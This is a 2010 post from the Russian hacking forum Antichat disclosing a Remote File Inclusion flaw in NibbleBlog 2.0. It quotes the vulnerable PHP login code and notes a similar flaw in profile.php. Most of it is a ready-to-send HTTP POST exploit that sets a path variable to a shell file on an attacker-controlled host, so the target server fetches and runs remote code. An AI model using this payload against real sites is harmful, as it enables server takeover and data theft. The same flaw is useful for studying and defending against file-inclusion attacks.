ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

NibbleBlog 2.0 Remote File Inclusion
  #22  
Старый 03.06.2010, 13:12
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию NibbleBlog 2.0 Remote File Inclusion

NibbleBlog 2.0
Site: http://www.nibbleblog.com

Remote File Inclusion

Vuln file: /admin/includes/index_login.php
PHP код:
    if($var_url['exe']=='login')
    {
            
$var_form['login_user'] = (string) $_POST['form_field_user'];
            
$var_form['login_password'] = (string) $_POST['form_field_password'];

            if( !empty(
$var_form['login_user']) && !empty($var_form['login_password']) )
            {
                include(
$_PATH['shadow.php']);
/*...*/ 
Подобная уязвимость в /admin/includes/profile.php
Need: register_globals = On
Exploit:
Код:
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf
__________________
Avant que l'ombre...
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ